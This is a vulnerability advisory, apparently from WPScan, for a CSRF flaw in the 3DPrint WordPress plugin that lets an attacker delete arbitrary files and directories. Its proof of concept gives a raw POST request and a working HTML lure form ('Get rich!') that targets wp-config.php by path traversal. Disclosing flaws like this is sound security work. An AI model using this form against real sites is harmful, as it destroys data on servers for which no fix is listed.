WordPress Plugin Vulnerabilities
3DPrint <= 3.5.4.7 - Arbitrary File and Directory Deletion via CSRF
Description
The plugin does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will delete any number of files or directories on the target server by tricking a logged in admin into submitting a form.
Proof of Concept
== RAW POST Request==
POST /wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php HTTP/1.1
Host: example.com
Cookie: [admin+]
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
group=1&delete=1&file%5b0%5d=../2022&file%5b1%5d=../../../wp-config.php
== HTML form ==
<form action="https://example.com//wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php" method="POST">
<input type="hidden" name="group" value="1">
<input type="hidden" name="delete" value="1">
<input type="hidden" name="file[1]" value="../2020">
<input type="hidden" name="file[2]" value="../../../wp-config.php">
<input type="submit" value="Get rich!">
</form>
== Notes ==
The value of 'group' and 'delete' can be anything, they are never used.
The file path of the files and dirs to delete is relative to the plugin upload root, 'wp-content/uploads/p3d'. Directories are deleted recursively. Affects Plugins
No known fix
References
Classification
Miscellaneous
Original Researcher
WPScan team
Submitter
Harald Eilertsen
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-11-08 (about 2 months ago)
Added
2022-11-08 (about 2 months ago)
Last Updated
2022-12-12 (about 1 months ago)